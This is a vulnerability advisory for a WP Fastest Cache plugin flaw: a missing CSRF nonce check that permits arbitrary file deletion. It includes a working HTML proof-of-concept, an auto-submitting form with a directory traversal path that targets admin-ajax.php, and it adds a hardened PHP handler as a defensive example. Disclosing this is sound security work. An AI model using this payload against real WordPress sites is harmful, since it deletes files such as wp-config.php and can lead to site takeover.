WP Fastest Cache < 0.9.0.3 - Cross-Site Request Forgery (CSRF) Arbitrary File Deletion



Description
The plugin did not have a CSRF nonce check on the "wpfc_delete_current_page_cache" action, allowing CSRF attacks against authenticated users to delete arbitrary files, including the wp-config.php file.
Proof of Concept
    <html>
    <head></head>
    <body>
    <form id="form" action="https://example.com/wp-admin/admin-ajax.php?path=/../../../.." method="post">
    <input type="hidden" name="action" value="wpfc_delete_current_page_cache"/>
    </form>
    <script>document.form.submit();</script>
    </body>
    </html>
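
The description attributes the bug to a missing nonce check on an AJAX action that acts on a request-supplied path. The following is an added example, not the plugin's code or its actual fix: a handler of that shape with a nonce check, a capability check and path containment. The action name `example_delete_page_cache`, the `security` nonce field, the POST `path` field and the cache directory are all assumptions.

```php
<?php
// Added example: hypothetical handler, not WP Fastest Cache code.
// Assumed names: action "example_delete_page_cache", nonce field "security",
// request field "path", cache root WP_CONTENT_DIR . '/cache/example'.
// The admin page that triggers it would embed
// wp_create_nonce( 'example_delete_page_cache' ) as the "security" field.

add_action( 'wp_ajax_example_delete_page_cache', 'example_delete_page_cache' );

function example_delete_page_cache() {
    // 1. CSRF: a forged cross-site form cannot supply a nonce bound to this
    //    action and the logged-in user. Passing false as the third argument
    //    makes the function return false instead of dying, so we pick the status.
    if ( ! check_ajax_referer( 'example_delete_page_cache', 'security', false ) ) {
        wp_send_json_error( 'Invalid or missing nonce', 403 );
    }

    // 2. Authorization: a nonce proves intent, not permission.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'Insufficient permissions', 403 );
    }

    // 3. Path containment: resolve "..", symlinks and duplicate slashes first,
    //    then require the result to sit strictly below the cache root.
    $root = realpath( WP_CONTENT_DIR . '/cache/example' );
    $rel  = isset( $_POST['path'] ) ? wp_unslash( $_POST['path'] ) : '';
    $real = ( false !== $root && is_string( $rel ) )
        ? realpath( $root . '/' . ltrim( $rel, '/' ) )
        : false;

    if ( false === $real || 0 !== strpos( $real, $root . DIRECTORY_SEPARATOR ) ) {
        wp_send_json_error( 'Path is outside the cache directory', 400 );
    }

    // 4. Delete regular files only; never recurse from a request-supplied path.
    if ( ! is_file( $real ) || ! unlink( $real ) ) {
        wp_send_json_error( 'Delete failed', 500 );
    }

    wp_send_json_success();
}
```

The nonce check alone stops the cross-site request; the containment check limits what a legitimate but mistaken or compromised admin session can delete.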

Affects Plugin

Fixed in version 0.9.0.3

References

URL https://wearetradecraft.com/advisories/tc-2020-0001/
URL https://plugins.trac.wordpress.org/changeset/2235160/wp-fastest-cache

Classification

Type CSRF
CWE CWE-352

Miscellaneous

Original Researcher Glyn Wintle (Tradecraft)
Views 1425
Verified No
WPVDB ID 10121

Timeline

Publicly Published 2020-02-05 (4 months ago)
Added 2020-03-09 (3 months ago)
Last Updated 2020-03-10 (3 months ago)
